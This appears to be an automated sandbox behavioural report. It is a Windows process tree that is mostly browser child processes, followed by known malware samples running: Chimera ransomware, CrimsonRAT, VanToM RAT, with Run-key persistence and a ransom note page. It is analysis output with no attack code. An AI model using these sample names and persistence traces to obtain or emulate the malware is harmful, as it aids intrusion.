C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8008 -prefsLen 36154 -prefMapHandle 8012 -prefMapSize 270978 -jsInitHandle 8016 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8024 -initialChannelId {af4eccfa-1caf-4933-b082-556f66869577} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 23 tab3⤵
- Checks processor information in registry
PID:5492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8204 -prefsLen 36154 -prefMapHandle 8208 -prefMapSize 270978 -jsInitHandle 8212 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8220 -initialChannelId {f9d7dfc9-c63e-4be5-a693-c33580c93bcf} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 24 tab3⤵PID:928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8416 -prefsLen 36154 -prefMapHandle 8420 -prefMapSize 270978 -jsInitHandle 8424 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8432 -initialChannelId {03276d89-5665-409f-97b4-587650a87c90} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 25 tab3⤵PID:5596
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8628 -prefsLen 36154 -prefMapHandle 8632 -prefMapSize 270978 -jsInitHandle 8636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8644 -initialChannelId {9cbde0ae-efa8-4b2d-8f8f-906c75368304} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 26 tab3⤵
- Checks processor information in registry
PID:3076
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8820 -prefsLen 36154 -prefMapHandle 8824 -prefMapSize 270978 -jsInitHandle 8828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8836 -initialChannelId {e40f4994-7681-436a-9397-54be9c2999ff} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 27 tab3⤵
- Checks processor information in registry
PID:2172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9052 -prefsLen 36154 -prefMapHandle 9056 -prefMapSize 270978 -jsInitHandle 9060 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9068 -initialChannelId {189c9916-ea28-4a2b-a2f9-06b6b9dbc374} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 28 tab3⤵
- Checks processor information in registry
PID:1156
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9248 -prefsLen 36154 -prefMapHandle 9252 -prefMapSize 270978 -jsInitHandle 9256 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9264 -initialChannelId {012814d2-148a-4641-9183-259246bde038} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 29 tab3⤵
- Checks processor information in registry
PID:6080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9440 -prefsLen 36154 -prefMapHandle 9444 -prefMapSize 270978 -jsInitHandle 9448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9456 -initialChannelId {6c838d08-e823-42e1-b252-2ecffcaa8271} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 30 tab3⤵PID:5484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9564 -prefsLen 36154 -prefMapHandle 9568 -prefMapSize 270978 -jsInitHandle 9572 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9580 -initialChannelId {1f703f78-065e-4fab-a410-9132140f00ec} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 31 tab3⤵
- Checks processor information in registry
PID:392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9688 -prefsLen 36154 -prefMapHandle 9692 -prefMapSize 270978 -jsInitHandle 9696 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9704 -initialChannelId {45360494-4c7d-48f1-8ac5-06d3be74e7fd} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 32 tab3⤵
- Checks processor information in registry
PID:1480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9880 -prefsLen 36154 -prefMapHandle 9884 -prefMapSize 270978 -jsInitHandle 9888 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9896 -initialChannelId {b504caea-4482-4fd8-9b78-b1ca01e3c805} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 33 tab3⤵
- Checks processor information in registry
PID:5156
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 10072 -prefsLen 36154 -prefMapHandle 10076 -prefMapSize 270978 -jsInitHandle 10080 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 10088 -initialChannelId {2bd1d722-09da-45f3-97d3-0a0c7396b242} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 34 tab3⤵
- Checks processor information in registry
PID:5480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 10308 -prefsLen 36154 -prefMapHandle 10312 -prefMapSize 270978 -jsInitHandle 10316 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 10280 -initialChannelId {669fbd20-be12-4484-96f1-d494693817d0} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 35 tab3⤵
- Checks processor information in registry
PID:5532
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 10488 -prefsLen 36154 -prefMapHandle 10492 -prefMapSize 270978 -jsInitHandle 10496 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 10504 -initialChannelId {9955c154-1660-4f35-8381-e42910f52153} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 36 tab3⤵
- Checks processor information in registry
PID:5544
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 10688 -prefsLen 36154 -prefMapHandle 10692 -prefMapSize 270978 -jsInitHandle 10696 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 10704 -initialChannelId {888366a5-86d9-458a-86aa-b915c3ff26b5} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 37 tab3⤵
- Checks processor information in registry
PID:5576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 10900 -prefsLen 36154 -prefMapHandle 10904 -prefMapSize 270978 -jsInitHandle 10908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 10916 -initialChannelId {bd86bc79-b499-45e6-97eb-28120d5e12af} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 38 tab3⤵PID:5592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 11092 -prefsLen 36154 -prefMapHandle 11096 -prefMapSize 270978 -jsInitHandle 11100 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 11108 -initialChannelId {41f35224-c7fa-42b2-a22c-dce2f5b058ba} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 39 tab3⤵
- Checks processor information in registry
PID:5740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 11288 -prefsLen 36154 -prefMapHandle 11292 -prefMapSize 270978 -jsInitHandle 11296 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 11304 -initialChannelId {3c7c0a42-0baf-4dc8-bb09-4e552cba329e} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 40 tab3⤵
- Checks processor information in registry
PID:2612
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 11480 -prefsLen 36154 -prefMapHandle 11484 -prefMapSize 270978 -jsInitHandle 11488 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 11496 -initialChannelId {562bd138-b5b6-49f4-aa2c-9a45054fae2a} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 41 tab3⤵
- Checks processor information in registry
PID:5412
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 11672 -prefsLen 36154 -prefMapHandle 11676 -prefMapSize 270978 -jsInitHandle 11680 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 11688 -initialChannelId {447550a0-f2df-4d9f-9cae-2a8c26df8323} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 42 tab3⤵
- Checks processor information in registry
PID:5252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 11864 -prefsLen 36154 -prefMapHandle 11868 -prefMapSize 270978 -jsInitHandle 11872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 11880 -initialChannelId {1e0e7c46-cc47-473b-84b7-a2bb6d3baa01} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 43 tab3⤵PID:5264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 12076 -prefsLen 36154 -prefMapHandle 12080 -prefMapSize 270978 -jsInitHandle 12084 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 12092 -initialChannelId {fa2e24ef-ffcd-44ff-8f46-e8400534595a} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 44 tab3⤵
- Checks processor information in registry
PID:5296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 12268 -prefsLen 36154 -prefMapHandle 12272 -prefMapSize 270978 -jsInitHandle 12276 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 12284 -initialChannelId {d937f788-f7fa-416d-af0c-8a2207bcdf82} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 45 tab3⤵
- Checks processor information in registry
PID:5404
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 12464 -prefsLen 36154 -prefMapHandle 12468 -prefMapSize 270978 -jsInitHandle 12472 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 12480 -initialChannelId {d82f5f87-94c8-4bff-8d7e-b9ff147cb667} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 46 tab3⤵PID:5408
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:7096 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7fffbe59dcf8,0x7fffbe59dd04,0x7fffbe59dd102⤵PID:5988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2184,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2180 /prefetch:22⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2012,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2224 /prefetch:32⤵
- Downloads MZ/PE file
PID:5608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2424,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2580 /prefetch:82⤵PID:2024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3128 /prefetch:12⤵PID:3628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3196 /prefetch:12⤵PID:4792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4516,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4552 /prefetch:12⤵PID:5540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5224,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5244 /prefetch:82⤵PID:1836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5308,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5416 /prefetch:12⤵PID:6208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3392,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3320 /prefetch:12⤵PID:5316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5820,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5876 /prefetch:82⤵PID:6700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5852,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5604 /prefetch:82⤵PID:6708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5864,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5804 /prefetch:82⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5964,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5804 /prefetch:82⤵PID:2172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5796,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5912 /prefetch:82⤵PID:1396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=908,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5896 /prefetch:82⤵PID:3212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6100,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6140 /prefetch:82⤵PID:4080
-
-
C:\Users\Admin\Downloads\website ip grabber.exe"C:\Users\Admin\Downloads\website ip grabber.exe"2⤵
- Chimera
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
PID:5380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A0E9.tmp\website ip grabber.bat""3⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Downloads\YOUR_FILES_ARE_ENCRYPTED.HTML"3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:7212 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7212 CREDAT:17410 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5112
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4204,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5928 /prefetch:82⤵PID:1376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=6084,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6008 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5624,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:444
-
-
C:\Users\Admin\Downloads\CookieClickerHack.exe"C:\Users\Admin\Downloads\CookieClickerHack.exe"2⤵
- Executes dropped EXE
PID:4208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6036,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4432 /prefetch:82⤵PID:6268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5712,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1108 /prefetch:82⤵PID:4848
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2088 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:4940
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6448,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1108 /prefetch:82⤵PID:6476
-
-
C:\Users\Admin\Downloads\VanToM-Rat.bat"C:\Users\Admin\Downloads\VanToM-Rat.bat"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1448 -
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4000
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6464,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1108 /prefetch:82⤵PID:6332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6528,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6516 /prefetch:82⤵PID:6872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6500,i,6539032302794548774,280739568161154191,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6488 /prefetch:82⤵PID:5544
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\is-581GF.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-581GF.tmp\butterflyondesktop.tmp" /SL5="$902B2,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4576 -
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"4⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html4⤵PID:6488
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html5⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
